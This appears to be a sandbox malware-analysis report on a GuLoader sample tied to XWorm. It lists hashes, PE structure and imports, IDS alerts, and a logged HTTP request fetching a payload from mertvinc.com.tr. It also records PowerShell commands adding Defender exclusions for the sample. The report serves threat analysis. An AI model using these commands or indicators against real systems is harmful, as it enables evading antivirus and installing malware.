• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:yVVZdG2NJX.exe
File size:568'338 bytes
MD5:18ea5087eb82e075ca35d2b2dcff9450
SHA1:dc436fbaa777672d44a8b90b98c4a1c266885845
SHA256:a7247c64cc0168290ca3b210e59ef629b46f513205bc6562ec79cdd2cda71725
SHA512:8fbeb3caf13a3fe1359002c2848ff5767e6b2f226049546c683f2b6144756196cfe39f66e4959c8426cdfaeff6a169a4cf5939de241e4a898887d8810ec620c6
SSDEEP:12288:32EIiN/Z1++w1p+wJuQbIgJwCQBk5wBcamd3ZhZs:3wiN/K+wHBfhQBk5s3mdPZs
TLSH:27C4E050F15CE897E52B15718C7FD531169BBB5CA1F8420E329A7A1A69E334320AFE0F
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
Icon Hash:38206a6a62666429
Entrypoint:0x40336c
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:b34f154ec913d2d2c435cbd644e91687
Entrypoint Preview (Instruction):
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A8A2Ch], eax
je 00007FE748B24D63h
push ebx
call 00007FE748B28015h
cmp eax, ebx
je 00007FE748B24D59h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FE748B27F8Fh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FE748B24D3Ch
push 0000000Ah
call 00007FE748B27FE8h
push 00000008h
call 00007FE748B27FE1h
push 00000006h
mov dword ptr [007A8A24h], eax
call 00007FE748B27FD5h
cmp eax, ebx
je 00007FE748B24D61h
push 0000001Eh
call eax
test eax, eax
je 00007FE748B24D59h
or byte ptr [007A8A2Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [007A8AF8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0079FEE0h
call dword ptr [00408188h]
push 0040A2C8h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Data Directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0x17000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6400 | 0x6400 | eed0986138e3ef22dbb386f4760a55c0 | False | 0.6783203125 | data | 6.511089687733535 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb38 | 0x600 | 09e0c528682cd2747c63b7ba39c2cc23 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c7000 | 0x17000 | 0x17000 | c8f8279129ad38fd03ee7b50a97e5aea | False | 0.21903659986413043 | data | 5.096977274603887 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x3c7388 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x3c76f0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.16976221459836743
RT_ICON | 0x3d7f18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.32863070539419087
RT_ICON | 0x3da4c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.42424953095684803
RT_ICON | 0x3db568 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.30730277185501065
RT_ICON | 0x3dc410 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.32445848375451264
RT_ICON | 0x3dccb8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.2579479768786127
RT_ICON | 0x3dd220 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6374113475177305
RT_DIALOG | 0x3dd688 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x3dd7d0 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x3dd910 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3dda10 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3ddb30 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3ddbf8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3ddc58 | 0x68 | data | English | United States | 0.7211538461538461
RT_MANIFEST | 0x3ddcc0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T16:37:41.543353+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49776 | 185.244.144.68 | 80 | TCP
2024-11-24T16:38:12.671473+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.10 | 49821 | 87.121.86.8 | 4020 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 16:37:39.888823032 CET | 53340 | 53 | 192.168.2.10 | 1.1.1.1
Nov 24, 2024 16:37:40.028912067 CET | 53 | 53340 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 16:37:39.888823032 CET | 192.168.2.10 | 1.1.1.1 | 0xf9f | Standard query (0) | mertvinc.com.tr | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 16:37:04.649529934 CET | 1.1.1.1 | 192.168.2.10 | 0xc902 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 16:37:04.649529934 CET | 1.1.1.1 | 192.168.2.10 | 0xc902 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 16:37:40.028912067 CET | 1.1.1.1 | 192.168.2.10 | 0xf9f | No error (0) | mertvinc.com.tr | | 185.244.144.68 | A (IP address) | IN (0x0001) | false
                                                                    • mertvinc.com.tr
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49776 | 185.244.144.68 | 80 | 7796 | C:\Users\user\Desktop\yVVZdG2NJX.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 16:37:40.158443928 CET | 186 | OUT | GET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: mertvinc.com.tr
Cache-Control: no-cache
Nov 24, 2024 16:37:41.542453051 CET | 297 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/octet-stream
Last-Modified: Wed, 20 Nov 2024 06:43:56 GMT
Etag: "8e40-673d852c-bd5a9871c8854887;;;"
Accept-Ranges: bytes
Content-Length: 36416
Date: Sun, 24 Nov 2024 14:44:06 GMT
Server: LiteSpeed
X-Powered-By: PleskLin

                                                                    Target ID:0
                                                                    Start time:10:37:06
                                                                    Start date:24/11/2024
                                                                    Path:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\yVVZdG2NJX.exe"
                                                                    Imagebase:0x400000
                                                                    File size:568'338 bytes
                                                                    MD5 hash:18EA5087EB82E075CA35D2B2DCFF9450
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1554696495.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1555288349.0000000004473000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:10:37:28
                                                                    Start date:24/11/2024
                                                                    Path:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\yVVZdG2NJX.exe"
                                                                    Imagebase:0x400000
                                                                    File size:568'338 bytes
                                                                    MD5 hash:18EA5087EB82E075CA35D2B2DCFF9450
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:10:37:45
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'
                                                                    Imagebase:0xcc0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:10:37:45
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff620390000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:10:37:49
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe'
                                                                    Imagebase:0xcc0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:10:37:49
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff620390000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:10:37:52
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'
                                                                    Imagebase:0xcc0000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:10:37:52
                                                                    Start date:24/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff620390000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                      Execution Graph

                                                                      Execution Coverage:19.5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:20.4%
                                                                      Total number of Nodes:1526
                                                                      Total number of Limit Nodes:38
4062b9 17 API calls 4993->4994 4995 404b59 lstrlenW wsprintfW SetDlgItemTextW 4994->4995 4995->4987 5231 40167b 5232 402c41 17 API calls 5231->5232 5233 401682 5232->5233 5234 402c41 17 API calls 5233->5234 5235 40168b 5234->5235 5236 402c41 17 API calls 5235->5236 5237 401694 MoveFileW 5236->5237 5238 4016a0 5237->5238 5239 4016a7 5237->5239 5240 401423 24 API calls 5238->5240 5241 4065da 2 API calls 5239->5241 5243 402250 5239->5243 5240->5243 5242 4016b6 5241->5242 5242->5243 5244 40605d 36 API calls 5242->5244 5244->5238 5245 703d2301 5246 703d236b 5245->5246 5247 703d2395 5246->5247 5248 703d2376 GlobalAlloc 5246->5248 5248->5246 5249 401e7d 5250 402c41 17 API calls 5249->5250 5251 401e83 5250->5251 5252 402c41 17 API calls 5251->5252 5253 401e8c 5252->5253 5254 402c41 17 API calls 5253->5254 5255 401e95 5254->5255 5256 402c41 17 API calls 5255->5256 5257 401e9e 5256->5257 5258 401423 24 API calls 5257->5258 5259 401ea5 5258->5259 5266 4058c3 ShellExecuteExW 5259->5266 5261 401ee7 5264 40288b 5261->5264 5267 406722 WaitForSingleObject 5261->5267 5263 401f01 CloseHandle 5263->5264 5266->5261 5268 40673c 5267->5268 5269 40674e GetExitCodeProcess 5268->5269 5270 4066ad 2 API calls 5268->5270 5269->5263 5271 406743 WaitForSingleObject 5270->5271 5271->5268 5272 703d1000 5273 703d101b 5 API calls 5272->5273 5274 703d1019 5273->5274 5275 40437e lstrlenW 5276 40439d 5275->5276 5277 40439f WideCharToMultiByte 5275->5277 5276->5277 5278 4046ff 5279 40472b 5278->5279 5280 40473c 5278->5280 5339 4058e1 GetDlgItemTextW 5279->5339 5282 404748 GetDlgItem 5280->5282 5288 4047a7 5280->5288 5283 40475c 5282->5283 5287 404770 SetWindowTextW 5283->5287 5291 405c17 4 API calls 5283->5291 5284 40488b 5337 404a3a 5284->5337 5341 4058e1 GetDlgItemTextW 5284->5341 5285 404736 5286 40652b 5 API calls 5285->5286 5286->5280 5292 40420e 18 API calls 5287->5292 5288->5284 5293 4062b9 17 API calls 5288->5293 5288->5337 5290 404275 8 API calls 5295 404a4e 5290->5295 5296 404766 5291->5296 
5297 40478c 5292->5297 5298 40481b SHBrowseForFolderW 5293->5298 5294 4048bb 5299 405c74 18 API calls 5294->5299 5296->5287 5303 405b6c 3 API calls 5296->5303 5300 40420e 18 API calls 5297->5300 5298->5284 5301 404833 CoTaskMemFree 5298->5301 5302 4048c1 5299->5302 5304 40479a 5300->5304 5305 405b6c 3 API calls 5301->5305 5342 406297 lstrcpynW 5302->5342 5303->5287 5340 404243 SendMessageW 5304->5340 5307 404840 5305->5307 5310 404877 SetDlgItemTextW 5307->5310 5314 4062b9 17 API calls 5307->5314 5309 4047a0 5312 406671 5 API calls 5309->5312 5310->5284 5311 4048d8 5313 406671 5 API calls 5311->5313 5312->5288 5320 4048df 5313->5320 5315 40485f lstrcmpiW 5314->5315 5315->5310 5317 404870 lstrcatW 5315->5317 5316 404920 5343 406297 lstrcpynW 5316->5343 5317->5310 5319 404927 5321 405c17 4 API calls 5319->5321 5320->5316 5325 405bb8 2 API calls 5320->5325 5326 404978 5320->5326 5322 40492d GetDiskFreeSpaceW 5321->5322 5324 404951 MulDiv 5322->5324 5322->5326 5324->5326 5325->5320 5327 4049e9 5326->5327 5329 404b84 20 API calls 5326->5329 5328 404a0c 5327->5328 5330 40140b 2 API calls 5327->5330 5344 404230 EnableWindow 5328->5344 5331 4049d6 5329->5331 5330->5328 5333 4049eb SetDlgItemTextW 5331->5333 5334 4049db 5331->5334 5333->5327 5335 404abb 20 API calls 5334->5335 5335->5327 5336 404a28 5336->5337 5338 404658 SendMessageW 5336->5338 5337->5290 5338->5337 5339->5285 5340->5309 5341->5294 5342->5311 5343->5319 5344->5336 5345 4019ff 5346 402c41 17 API calls 5345->5346 5347 401a06 5346->5347 5348 402c41 17 API calls 5347->5348 5349 401a0f 5348->5349 5350 401a16 lstrcmpiW 5349->5350 5351 401a28 lstrcmpW 5349->5351 5352 401a1c 5350->5352 5351->5352 5353 401000 5354 401037 BeginPaint GetClientRect 5353->5354 5355 40100c DefWindowProcW 5353->5355 5356 4010f3 5354->5356 5360 401179 5355->5360 5358 401073 CreateBrushIndirect FillRect DeleteObject 5356->5358 5359 4010fc 5356->5359 5358->5356 5361 401102 CreateFontIndirectW 5359->5361 5362 401167 EndPaint 5359->5362 
5361->5362 5363 401112 6 API calls 5361->5363 5362->5360 5363->5362 5364 401503 5365 40150b 5364->5365 5367 40151e 5364->5367 5366 402c1f 17 API calls 5365->5366 5366->5367 4242 402484 4253 402c81 4242->4253 4245 402c41 17 API calls 4246 402497 4245->4246 4247 4024a2 RegQueryValueExW 4246->4247 4252 40288b 4246->4252 4248 4024c8 RegCloseKey 4247->4248 4249 4024c2 4247->4249 4248->4252 4249->4248 4258 4061de wsprintfW 4249->4258 4254 402c41 17 API calls 4253->4254 4255 402c98 4254->4255 4256 406104 RegOpenKeyExW 4255->4256 4257 40248e 4256->4257 4257->4245 4258->4248 5368 402104 5369 402c41 17 API calls 5368->5369 5370 40210b 5369->5370 5371 402c41 17 API calls 5370->5371 5372 402115 5371->5372 5373 402c41 17 API calls 5372->5373 5374 40211f 5373->5374 5375 402c41 17 API calls 5374->5375 5376 402129 5375->5376 5377 402c41 17 API calls 5376->5377 5379 402133 5377->5379 5378 402172 CoCreateInstance 5383 402191 5378->5383 5379->5378 5380 402c41 17 API calls 5379->5380 5380->5378 5381 401423 24 API calls 5382 402250 5381->5382 5383->5381 5383->5382 5384 401f06 5385 402c41 17 API calls 5384->5385 5386 401f0c 5385->5386 5387 4052ff 24 API calls 5386->5387 5388 401f16 5387->5388 5389 405880 2 API calls 5388->5389 5390 401f1c 5389->5390 5391 40288b 5390->5391 5392 406722 5 API calls 5390->5392 5395 401f3f CloseHandle 5390->5395 5394 401f31 5392->5394 5394->5395 5397 4061de wsprintfW 5394->5397 5395->5391 5397->5395 5398 703d1671 5399 703d1516 GlobalFree 5398->5399 5402 703d1689 5399->5402 5400 703d16cf GlobalFree 5401 703d16a4 5401->5400 5402->5400 5402->5401 5403 703d16bb VirtualFree 5402->5403 5403->5400 5404 40190c 5405 401943 5404->5405 5406 402c41 17 API calls 5405->5406 5407 401948 5406->5407 5408 4059a9 67 API calls 5407->5408 5409 401951 5408->5409 5410 40230c 5411 402314 5410->5411 5414 40231a 5410->5414 5412 402c41 17 API calls 5411->5412 5412->5414 5413 402328 5416 402c41 17 API calls 5413->5416 5418 402336 5413->5418 5414->5413 5415 402c41 17 API calls 
5414->5415 5415->5413 5416->5418 5417 402c41 17 API calls 5419 40233f WritePrivateProfileStringW 5417->5419 5418->5417 5420 401f8c 5421 402c41 17 API calls 5420->5421 5422 401f93 5421->5422 5423 406671 5 API calls 5422->5423 5424 401fa2 5423->5424 5425 402026 5424->5425 5426 401fbe GlobalAlloc 5424->5426 5426->5425 5427 401fd2 5426->5427 5428 406671 5 API calls 5427->5428 5429 401fd9 5428->5429 5430 406671 5 API calls 5429->5430 5431 401fe3 5430->5431 5431->5425 5435 4061de wsprintfW 5431->5435 5433 402018 5436 4061de wsprintfW 5433->5436 5435->5433 5436->5425 5437 40238e 5438 4023c1 5437->5438 5439 402396 5437->5439 5440 402c41 17 API calls 5438->5440 5441 402c81 17 API calls 5439->5441 5442 4023c8 5440->5442 5443 40239d 5441->5443 5448 402cff 5442->5448 5445 4023d5 5443->5445 5446 402c41 17 API calls 5443->5446 5447 4023ae RegDeleteValueW RegCloseKey 5446->5447 5447->5445 5449 402d13 5448->5449 5451 402d0c 5448->5451 5449->5451 5452 402d44 5449->5452 5451->5445 5453 406104 RegOpenKeyExW 5452->5453 5459 402d72 5453->5459 5454 402dc3 5454->5451 5455 402d98 RegEnumKeyW 5456 402daf RegCloseKey 5455->5456 5455->5459 5457 406671 5 API calls 5456->5457 5461 402dbf 5457->5461 5458 402dd0 RegCloseKey 5458->5454 5459->5454 5459->5455 5459->5456 5459->5458 5460 402d44 6 API calls 5459->5460 5460->5459 5461->5454 5462 402de0 RegDeleteKeyW 5461->5462 5462->5454 5463 40190f 5464 402c41 17 API calls 5463->5464 5465 401916 5464->5465 5466 4058fd MessageBoxIndirectW 5465->5466 5467 40191f 5466->5467 5468 401491 5469 4052ff 24 API calls 5468->5469 5470 401498 5469->5470 5471 401d14 5472 402c1f 17 API calls 5471->5472 5473 401d1b 5472->5473 5474 402c1f 17 API calls 5473->5474 5475 401d27 GetDlgItem 5474->5475 5476 402592 5475->5476 5477 402598 5478 4025c7 5477->5478 5479 4025ac 5477->5479 5481 4025fb 5478->5481 5482 4025cc 5478->5482 5480 402c1f 17 API calls 5479->5480 5489 4025b3 5480->5489 5484 402c41 17 API calls 5481->5484 5483 402c41 17 API calls 5482->5483 5485 4025d3 
WideCharToMultiByte lstrlenA 5483->5485 5486 402602 lstrlenW 5484->5486 5485->5489 5486->5489 5487 40262f 5488 402645 5487->5488 5490 405e3f WriteFile 5487->5490 5489->5487 5489->5488 5491 405e6e 5 API calls 5489->5491 5490->5488 5491->5487 5492 703d10e1 5494 703d1111 5492->5494 5493 703d11d8 GlobalFree 5494->5493 5495 703d12ba 2 API calls 5494->5495 5496 703d11d3 5494->5496 5497 703d11f8 GlobalFree 5494->5497 5498 703d1272 2 API calls 5494->5498 5499 703d1164 GlobalAlloc 5494->5499 5500 703d12e1 lstrcpyW 5494->5500 5501 703d11c4 GlobalFree 5494->5501 5495->5494 5496->5493 5497->5494 5498->5501 5499->5494 5500->5494 5501->5494 5502 40149e 5503 4022f7 5502->5503 5504 4014ac PostQuitMessage 5502->5504 5504->5503 5505 401c1f 5506 402c1f 17 API calls 5505->5506 5507 401c26 5506->5507 5508 402c1f 17 API calls 5507->5508 5509 401c33 5508->5509 5510 401c48 5509->5510 5511 402c41 17 API calls 5509->5511 5512 401c58 5510->5512 5513 402c41 17 API calls 5510->5513 5511->5510 5514 401c63 5512->5514 5515 401caf 5512->5515 5513->5512 5517 402c1f 17 API calls 5514->5517 5516 402c41 17 API calls 5515->5516 5518 401cb4 5516->5518 5519 401c68 5517->5519 5520 402c41 17 API calls 5518->5520 5521 402c1f 17 API calls 5519->5521 5522 401cbd FindWindowExW 5520->5522 5523 401c74 5521->5523 5526 401cdf 5522->5526 5524 401c81 SendMessageTimeoutW 5523->5524 5525 401c9f SendMessageW 5523->5525 5524->5526 5525->5526 5527 703d18dd 5528 703d1900 5527->5528 5529 703d1935 GlobalFree 5528->5529 5530 703d1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5528->5530 5529->5530 5531 703d1272 2 API calls 5530->5531 5532 